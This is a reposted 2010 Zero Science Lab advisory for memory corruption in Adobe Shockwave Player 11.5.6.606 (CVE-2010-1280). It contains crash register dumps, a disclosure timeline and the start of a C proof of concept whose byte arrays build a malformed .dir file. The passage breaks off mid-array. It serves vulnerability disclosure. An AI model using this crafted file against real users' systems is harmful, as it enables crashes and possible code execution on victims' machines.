News.Dreamings.Org

Adobe Shockwave Player 11.5.6.606 (DIR) Multiple Memory Vulnerabilities

Georges Kut — Wed, 12 May 2010 18:21:29 +0000

Title: Adobe Shockwave Player 11.5.6.606 (DIR) Multiple Memory Vulnerabilities

Vendor: Adobe Systems Incorporated

Product web page: http://www.adobe.com

Summary: Over 450 million Internet-enabled desktops have installed Adobe Shockwave Player.

These people now have access to some of the best the Web has to offer - including

dazzling 3D games and entertainment, interactive product demonstrations, and online

learning applications. Shockwave Player displays Web content that has been created

by Adobe Director.

Desc: Shockwave Player version 11.5.6.606 and earlier from Adobe suffers from a memory consumption /

corruption and buffer overflow vulnerabilities that can aid the attacker to cause denial of service

scenarios and arbitrary code execution. The vulnerable software fails to sanitize user input when

processing .dir files resulting in a crash and overwrite of a few memory registers.

Tested on: Microsoft Windows XP Professional SP3 (English)

Version tested: 11.5.6.606

====================================================================================================

(f94.ae4): Access violation - code c0000005 (first chance)

First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8

eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206

*** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll

*** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll -

DIRAPI!Ordinal14+0x3b16:

68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????

----------------------------------------------------------------------------------------------------

EAX FFFFFFFF

ECX 41414141

EDX FFFFFFFF

EBX 00000018

ESP 0012F3B4

EBP 02793578

ESI 0012F3C4

EDI 02793578

EIP 69009F1F IML32.69009F1F

====================================================================================================

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

liquidworm gmail com

Zero Science Lab - Macedonian Information Security Research & Development Laboratory

http://www.zeroscience.mk

19.09.2009

Zero Science Lab Advisory ID: ZSL-2010-4937

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php

Adobe Advisory ID: APSB10-12

Advisory: http://www.adobe.com/support/security/bulletins/apsb10-12.html

CVE ID: CVE-2010-1280

Disclosure timeline: [19.09.2009] Vulnerability discovered.

[09.03.2010] Vendor contacted with sent PoC files.

[09.03.2010] Vendor replied.

[21.03.2010] Asked vendor for confirmation.

[21.03.2010] Vendor verifies the weakness.

[06.05.2010] Vendor reveals patch release date.

[11.05.2010] Coordinated public advisory.

*/

#include

#define FFORMAT "Shock.dir"

FILE *fp;

char shocks[] = {

0x58, 0x46, 0x49, 0x52, 0x2C, 0x23, 0x00, 0x00, 0x33, 0x39, 0x56, 0x4D, 0x70, 0x61, 0x6D, 0x69,

0x18, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x2C, 0x00, 0x00, 0x00, 0x82, 0x07, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x70, 0x61, 0x6D, 0x6D,

0x38, 0x03, 0x00, 0x00, 0x18, 0x00, 0x14, 0x00, 0x28, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00,

0x18, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x17, 0x00, 0x00, 0x00, 0x58, 0x46, 0x49, 0x52,

0x2C, 0x23, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x70, 0x61, 0x6D, 0x69, 0x18, 0x00, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,

0x88, 0x8F, 0xE2, 0x0B, 0x70, 0x61, 0x6D, 0x6D, 0x38, 0x03, 0x00, 0x00, 0x2C, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0xE4, 0x6A, 0xE2, 0x0B, 0x2A, 0x59, 0x45, 0x4B, 0x74, 0x01, 0x00, 0x00,

0x6C, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x74, 0x53, 0x41, 0x43,

0x93, 0x00, 0x00, 0x00, 0xE4, 0x1B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x2A, 0x53, 0x41, 0x43, 0x04, 0x00, 0x00, 0x00, 0xD8, 0x1B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x58, 0x74, 0x63, 0x4C, 0x6C, 0x00, 0x00, 0x00, 0x80, 0x1C, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6B, 0x6E, 0x75, 0x6A, 0x00, 0x00, 0x00, 0x00,

0x86, 0x20, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x6B, 0x6E, 0x75, 0x6A,

0x00, 0x00, 0x00, 0x00, 0x7E, 0x20, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00 //252

};

char shocke[] = {

0x66, 0x6E, 0x69, 0x43, 0x3C, 0x00, 0x00, 0x00, 0x94, 0x1B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x6D, 0x61, 0x6E, 0x4C, 0x81, 0x03, 0x00, 0x00, 0xF4, 0x1C, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6D, 0x75, 0x68, 0x54, 0xC2, 0x00, 0x00, 0x00,

0x6A, 0x22, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x43, 0x52, 0x44,

0x64, 0x00, 0x00, 0x00, 0xE8, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x70, 0x6D, 0x58, 0x46, 0xEE, 0x0E, 0x00, 0x00, 0x74, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x4C, 0x73, 0x43, 0x4D, 0x3A, 0x00, 0x00, 0x00, 0xF6, 0x18, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x64, 0x72, 0x6F, 0x53, 0x18, 0x00, 0x00, 0x00,

0x54, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49, 0x46, 0x57, 0x56,

0xA8, 0x00, 0x00, 0x00, 0x8E, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x43, 0x53, 0x57, 0x56, 0xF8, 0x00, 0x00, 0x00, 0x3E, 0x21, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x6B, 0x6E, 0x75, 0x6A, 0x00, 0x00, 0x00, 0x00, 0x54, 0x22, 0x00, 0x00,

0x04, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x42, 0x4C, 0x57, 0x56, 0x06, 0x00, 0x00, 0x00,

0x46, 0x22, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x65, 0x65, 0x72, 0x66,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF,

0x6E, 0x61, 0x68, 0x43, 0x06, 0x00, 0x00, 0x00, 0x5C, 0x22, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x6C, 0x52, 0x54, 0x58, 0x83, 0x04, 0x00, 0x00, 0x6A, 0x14, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x65, 0x65, 0x72, 0x66, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x6B, 0x6E, 0x75, 0x6A,

0x00, 0x00, 0x00, 0x00, 0x3E, 0x22, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x12, 0x00, 0x00, 0x00,

0x53, 0x52, 0x45, 0x56, 0x0C, 0x00, 0x00, 0x00, 0x38, 0x19, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x4C, 0x4F, 0x43, 0x46, 0x38, 0x00, 0x00, 0x00, 0x4C, 0x19, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4C, 0x42, 0x55, 0x50, 0x99, 0x01, 0x00, 0x00,

0x8C, 0x19, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x49, 0x52, 0x47,

0x10, 0x00, 0x00, 0x00, 0x2E, 0x1B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x4C, 0x46, 0x44, 0x4D, 0x06, 0x00, 0x00, 0x00, 0x46, 0x1B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x46, 0x52, 0x43, 0x53, 0x18, 0x00, 0x00, 0x00, 0x54, 0x1B, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x52, 0x43, 0x53, 0x18, 0x00, 0x00, 0x00,

0x74, 0x1B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2A, 0x59, 0x45, 0x4B,

0x74, 0x01, 0x00, 0x00, 0x0C, 0x00, 0x0C, 0x00, 0x1E, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00,

0x0B, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x6D, 0x75, 0x68, 0x54, 0x15, 0x00, 0x00, 0x00,

0x00, 0x04, 0x00, 0x00, 0x6E, 0x61, 0x68, 0x43, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00,

0x46, 0x43, 0x52, 0x44, 0x1A, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x4C, 0x4F, 0x43, 0x46,

0x0D, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x70, 0x6D, 0x58, 0x46, 0x1C, 0x00, 0x00, 0x00,

0x00, 0x04, 0x00, 0x00, 0x44, 0x49, 0x52, 0x47, 0x0E, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00,

0x4C, 0x73, 0x43, 0x4D, 0x1D, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x4C, 0x46, 0x44, 0x4D,

0x1B, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x4C, 0x42, 0x55, 0x50, 0x1E, 0x00, 0x00, 0x00,

0x00, 0x04, 0x00, 0x00, 0x46, 0x52, 0x43, 0x53, 0x0F, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00,

0x64, 0x72, 0x6F, 0x53, 0x19, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x53, 0x52, 0x45, 0x56,

0x10, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x49, 0x46, 0x57, 0x56, 0x13, 0x00, 0x00, 0x00,

0x00, 0x04, 0x00, 0x00, 0x42, 0x4C, 0x57, 0x56, 0x11, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00,

0x43, 0x53, 0x57, 0x56, 0x16, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x6C, 0x52, 0x54, 0x58,

0x1F, 0x00, 0x00, 0x00, 0x01, 0x04, 0x00, 0x00, 0x46, 0x52, 0x43, 0x53, 0x05, 0x00, 0x00, 0x00,

0x00, 0x04, 0x01, 0x00, 0x2A, 0x53, 0x41, 0x43, 0x09, 0x00, 0x00, 0x00, 0x00, 0x04, 0x01, 0x00,

0x66, 0x6E, 0x69, 0x43, 0x06, 0x00, 0x00, 0x00, 0x00, 0x04, 0x01, 0x00, 0x58, 0x74, 0x63, 0x4C,

0x06, 0x00, 0x00, 0x00, 0x00, 0x04, 0x01, 0x00, 0x58, 0x74, 0x63, 0x4C, 0x06, 0x00, 0x00, 0x00,

0x00, 0x04, 0x01, 0x00, 0x58, 0x74, 0x63, 0x4C, 0x06, 0x00, 0x00, 0x00, 0x00, 0x04, 0x01, 0x00,

0x58, 0x74, 0x63, 0x4C, 0x06, 0x00, 0x00, 0x00, 0x00, 0x04, 0x01, 0x00, 0x58, 0x74, 0x63, 0x4C,

0x06, 0x00, 0x00, 0x00, 0x00, 0x04, 0x01, 0x00, 0x58, 0x74, 0x63, 0x4C, 0x08, 0x00, 0x00, 0x00,

0x00, 0x04, 0x01, 0x00, 0x20, 0x6C, 0x63, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x43, 0x52, 0x44, 0x64, 0x00, 0x00, 0x00,

0x00, 0x64, 0x07, 0x82, 0x00, 0x6C, 0x00, 0x70, 0x02, 0x4C, 0x02, 0xF0, 0x00, 0x01, 0x00, 0x01,

0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0xFF, 0x00, 0x20, 0xFD, 0x00,

0x00, 0x00, 0x00, 0x00, 0x07, 0x82, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,

0x00, 0x00, 0x00, 0x00, 0x01, 0x50, 0x00, 0x1E, 0x00, 0x02, 0x0C, 0x3C, 0x00, 0x00, 0x00, 0x3C,

0x3F, 0xD7, 0xE6, 0x36, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0x9B,

0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x01, 0x7A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x64, 0x72, 0x6F, 0x53, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x14, 0x00, 0x04,

0x00, 0x01, 0x00, 0x01, 0x70, 0x6D, 0x58, 0x46, 0xEE, 0x0E, 0x00, 0x00, 0x3B, 0x20, 0x43, 0x6F,

0x70, 0x79, 0x72, 0x69, 0x67, 0x68, 0x74, 0x20, 0x31, 0x39, 0x39, 0x34, 0x2D, 0x32, 0x30, 0x30,

0x38, 0x2C, 0x20, 0x41, 0x64, 0x6F, 0x62, 0x65, 0x20, 0x53, 0x79, 0x73, 0x74, 0x65, 0x6D, 0x73,

0x20, 0x49, 0x6E, 0x63, 0x6F, 0x72, 0x70, 0x6F, 0x72, 0x61, 0x74, 0x65, 0x64, 0x2E, 0x20, 0x20,

0x41, 0x6C, 0x6C, 0x20, 0x52, 0x69, 0x67, 0x68, 0x74, 0x73, 0x20, 0x52, 0x65, 0x73, 0x65, 0x72,

0x76, 0x65, 0x64, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D,

0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D,

0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x44, 0x65,

0x66, 0x61, 0x75, 0x6C, 0x74, 0x20, 0x46, 0x6F, 0x6E, 0x74, 0x20, 0x4D, 0x61, 0x70, 0x70, 0x69,

0x6E, 0x67, 0x20, 0x54, 0x61, 0x62, 0x6C, 0x65, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x44, 0x69, 0x72,

0x65, 0x63, 0x74, 0x6F, 0x72, 0x20, 0x4D, 0x61, 0x63, 0x69, 0x6E, 0x74, 0x6F, 0x73, 0x68, 0x20,

0x61, 0x6E, 0x64, 0x20, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B,

0x20, 0x54, 0x68, 0x69, 0x73, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x70, 0x72, 0x6F, 0x76, 0x69,

0x64, 0x65, 0x73, 0x20, 0x61, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69,

0x6E, 0x67, 0x20, 0x74, 0x61, 0x62, 0x6C, 0x65, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x44, 0x69, 0x72,

0x65, 0x63, 0x74, 0x6F, 0x72, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77,

0x73, 0x20, 0x0D, 0x3B, 0x20, 0x61, 0x6E, 0x64, 0x20, 0x4D, 0x61, 0x63, 0x69, 0x6E, 0x74, 0x6F,

0x73, 0x68, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x49, 0x66, 0x20, 0x61, 0x20, 0x63, 0x6F, 0x70,

0x79, 0x20, 0x6F, 0x66, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x69,

0x73, 0x20, 0x69, 0x6E, 0x20, 0x74, 0x68, 0x65, 0x20, 0x73, 0x61, 0x6D, 0x65, 0x20, 0x66, 0x6F,

0x6C, 0x64, 0x65, 0x72, 0x20, 0x6F, 0x72, 0x20, 0x64, 0x69, 0x72, 0x65, 0x63, 0x74, 0x6F, 0x72,

0x79, 0x20, 0x61, 0x73, 0x20, 0x74, 0x68, 0x65, 0x20, 0x0D, 0x3B, 0x20, 0x44, 0x69, 0x72, 0x65,

0x63, 0x74, 0x6F, 0x72, 0x20, 0x61, 0x70, 0x70, 0x6C, 0x69, 0x63, 0x61, 0x74, 0x69, 0x6F, 0x6E,

0x2C, 0x20, 0x44, 0x69, 0x72, 0x65, 0x63, 0x74, 0x6F, 0x72, 0x20, 0x77, 0x69, 0x6C, 0x6C, 0x20,

0x61, 0x75, 0x74, 0x6F, 0x6D, 0x61, 0x74, 0x69, 0x63, 0x61, 0x6C, 0x6C, 0x79, 0x20, 0x69, 0x6E,

0x63, 0x6C, 0x75, 0x64, 0x65, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x20,

0x0D, 0x3B, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x20, 0x74, 0x61, 0x62, 0x6C, 0x65,

0x20, 0x69, 0x6E, 0x20, 0x65, 0x76, 0x65, 0x72, 0x79, 0x20, 0x6E, 0x65, 0x77, 0x20, 0x6D, 0x6F,

0x76, 0x69, 0x65, 0x20, 0x79, 0x6F, 0x75, 0x20, 0x63, 0x72, 0x65, 0x61, 0x74, 0x65, 0x2E, 0x0D,

0x3B, 0x20, 0x0D, 0x3B, 0x20, 0x54, 0x6F, 0x20, 0x61, 0x64, 0x64, 0x20, 0x74, 0x68, 0x69, 0x73,

0x20, 0x66, 0x6F, 0x6E, 0x74, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x20, 0x74, 0x61,

0x62, 0x6C, 0x65, 0x20, 0x74, 0x6F, 0x20, 0x61, 0x6E, 0x20, 0x65, 0x78, 0x69, 0x73, 0x74, 0x69,

0x6E, 0x67, 0x20, 0x6D, 0x6F, 0x76, 0x69, 0x65, 0x2C, 0x20, 0x63, 0x68, 0x6F, 0x6F, 0x73, 0x65,

0x20, 0x0D, 0x3B, 0x20, 0x4D, 0x6F, 0x76, 0x69, 0x65, 0x3A, 0x50, 0x72, 0x6F, 0x70, 0x65, 0x72,

0x74, 0x69, 0x65, 0x73, 0x2E, 0x2E, 0x2E, 0x20, 0x66, 0x72, 0x6F, 0x6D, 0x20, 0x74, 0x68, 0x65,

0x20, 0x4D, 0x6F, 0x64, 0x69, 0x66, 0x79, 0x20, 0x6D, 0x65, 0x6E, 0x75, 0x2E, 0x20, 0x20, 0x54,

0x68, 0x65, 0x6E, 0x20, 0x63, 0x6C, 0x69, 0x63, 0x6B, 0x20, 0x4C, 0x6F, 0x61, 0x64, 0x20, 0x66,

0x72, 0x6F, 0x6D, 0x20, 0x46, 0x69, 0x6C, 0x65, 0x2E, 0x20, 0x20, 0x0D, 0x3B, 0x20, 0x55, 0x73,

0x65, 0x20, 0x74, 0x68, 0x65, 0x20, 0x64, 0x69, 0x61, 0x6C, 0x6F, 0x67, 0x20, 0x62, 0x6F, 0x78,

0x20, 0x74, 0x68, 0x61, 0x74, 0x20, 0x61, 0x70, 0x70, 0x65, 0x61, 0x72, 0x73, 0x20, 0x74, 0x6F,

0x20, 0x6C, 0x6F, 0x63, 0x61, 0x74, 0x65, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x69, 0x6C,

0x65, 0x2E, 0x0D, 0x3B, 0x20, 0x0D, 0x3B, 0x20, 0x4E, 0x6F, 0x74, 0x65, 0x3A, 0x20, 0x49, 0x6E,

0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x2C, 0x20, 0x61, 0x20, 0x73, 0x65,

0x6D, 0x69, 0x63, 0x6F, 0x6C, 0x6F, 0x6E, 0x20, 0x61, 0x74, 0x20, 0x74, 0x68, 0x65, 0x20, 0x62,

0x65, 0x67, 0x69, 0x6E, 0x6E, 0x69, 0x6E, 0x67, 0x20, 0x6F, 0x66, 0x20, 0x61, 0x20, 0x6C, 0x69,

0x6E, 0x65, 0x20, 0x69, 0x6E, 0x64, 0x69, 0x63, 0x61, 0x74, 0x65, 0x73, 0x0D, 0x3B, 0x20, 0x61,

0x20, 0x63, 0x6F, 0x6D, 0x6D, 0x65, 0x6E, 0x74, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x53, 0x70,

0x65, 0x63, 0x69, 0x61, 0x6C, 0x20, 0x4E, 0x6F, 0x74, 0x65, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x4D,

0x61, 0x63, 0x20, 0x4F, 0x53, 0x58, 0x20, 0x75, 0x73, 0x65, 0x72, 0x73, 0x3A, 0x20, 0x54, 0x68,

0x69, 0x73, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x69, 0x73, 0x20, 0x73, 0x61, 0x76, 0x65, 0x64,

0x20, 0x75, 0x73, 0x69, 0x6E, 0x67, 0x20, 0x74, 0x68, 0x65, 0x20, 0x27, 0x43, 0x6C, 0x61, 0x73,

0x73, 0x69, 0x63, 0x27, 0x20, 0x6C, 0x69, 0x6E, 0x65, 0x0D, 0x3B, 0x20, 0x65, 0x6E, 0x64, 0x69,

0x6E, 0x67, 0x20, 0x63, 0x68, 0x61, 0x72, 0x61, 0x63, 0x74, 0x65, 0x72, 0x20, 0x28, 0x43, 0x52,

0x29, 0x2E, 0x20, 0x20, 0x49, 0x66, 0x20, 0x79, 0x6F, 0x75, 0x20, 0x6E, 0x65, 0x65, 0x64, 0x20,

0x74, 0x6F, 0x20, 0x61, 0x6C, 0x74, 0x65, 0x72, 0x20, 0x61, 0x6E, 0x64, 0x20, 0x73, 0x61, 0x76,

0x65, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x2C, 0x20, 0x6D, 0x61, 0x6B,

0x65, 0x20, 0x73, 0x75, 0x72, 0x65, 0x20, 0x74, 0x6F, 0x20, 0x0D, 0x3B, 0x20, 0x70, 0x72, 0x65,

0x73, 0x65, 0x72, 0x76, 0x65, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x2D, 0x20, 0x74, 0x68, 0x65,

0x20, 0x55, 0x4E, 0x49, 0x58, 0x20, 0x6C, 0x69, 0x6E, 0x65, 0x20, 0x65, 0x6E, 0x64, 0x69, 0x6E,

0x67, 0x20, 0x63, 0x68, 0x61, 0x72, 0x61, 0x63, 0x74, 0x65, 0x72, 0x20, 0x28, 0x4C, 0x46, 0x29,

0x20, 0x77, 0x69, 0x6C, 0x6C, 0x20, 0x6E, 0x6F, 0x74, 0x20, 0x77, 0x6F, 0x72, 0x6B, 0x20, 0x70,

0x72, 0x6F, 0x70, 0x65, 0x72, 0x6C, 0x79, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B, 0x3D, 0x3D, 0x3D, 0x3D,

0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D,

0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x0D, 0x3B, 0x0D,

0x3B, 0x20, 0x46, 0x4F, 0x4E, 0x54, 0x20, 0x4D, 0x41, 0x50, 0x50, 0x49, 0x4E, 0x47, 0x53, 0x20,

0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x46, 0x6F, 0x6E, 0x74, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E,

0x67, 0x73, 0x20, 0x73, 0x70, 0x65, 0x63, 0x69, 0x66, 0x79, 0x20, 0x77, 0x68, 0x69, 0x63, 0x68,

0x20, 0x66, 0x6F, 0x6E, 0x74, 0x20, 0x61, 0x6E, 0x64, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x20, 0x73,

0x75, 0x62, 0x73, 0x74, 0x69, 0x74, 0x75, 0x74, 0x69, 0x6F, 0x6E, 0x73, 0x20, 0x74, 0x6F, 0x20,

0x6D, 0x61, 0x6B, 0x65, 0x20, 0x77, 0x68, 0x65, 0x6E, 0x0D, 0x3B, 0x20, 0x6D, 0x6F, 0x76, 0x69,

0x6E, 0x67, 0x20, 0x61, 0x20, 0x6D, 0x6F, 0x76, 0x69, 0x65, 0x20, 0x66, 0x72, 0x6F, 0x6D, 0x20,

0x6F, 0x6E, 0x65, 0x20, 0x70, 0x6C, 0x61, 0x74, 0x66, 0x6F, 0x72, 0x6D, 0x20, 0x74, 0x6F, 0x20,

0x61, 0x6E, 0x6F, 0x74, 0x68, 0x65, 0x72, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x54, 0x68, 0x65,

0x20, 0x66, 0x6F, 0x72, 0x6D, 0x61, 0x74, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x66, 0x6F, 0x6E, 0x74,

0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x20, 0x64, 0x65, 0x66, 0x69, 0x6E, 0x69, 0x74,

0x69, 0x6F, 0x6E, 0x73, 0x20, 0x69, 0x73, 0x3A, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x50, 0x6C, 0x61,

0x74, 0x66, 0x6F, 0x72, 0x6D, 0x3A, 0x46, 0x6F, 0x6E, 0x74, 0x4E, 0x61, 0x6D, 0x65, 0x20, 0x3D,

0x3E, 0x20, 0x50, 0x6C, 0x61, 0x74, 0x66, 0x6F, 0x72, 0x6D, 0x3A, 0x46, 0x6F, 0x6E, 0x74, 0x4E,

0x61, 0x6D, 0x65, 0x20, 0x5B, 0x4D, 0x41, 0x50, 0x20, 0x4E, 0x4F, 0x4E, 0x45, 0x5D, 0x20, 0x5B,

0x6F, 0x6C, 0x64, 0x53, 0x69, 0x7A, 0x65, 0x20, 0x3D, 0x3E, 0x20, 0x6E, 0x65, 0x77, 0x53, 0x69,

0x7A, 0x65, 0x5D, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x53, 0x70, 0x65, 0x63, 0x69,

0x66, 0x79, 0x69, 0x6E, 0x67, 0x20, 0x4D, 0x41, 0x50, 0x20, 0x4E, 0x4F, 0x4E, 0x45, 0x20, 0x74,

0x75, 0x72, 0x6E, 0x73, 0x20, 0x6F, 0x66, 0x66, 0x20, 0x63, 0x68, 0x61, 0x72, 0x61, 0x63, 0x74,

0x65, 0x72, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x74,

0x68, 0x69, 0x73, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x2E, 0x0D, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x49,

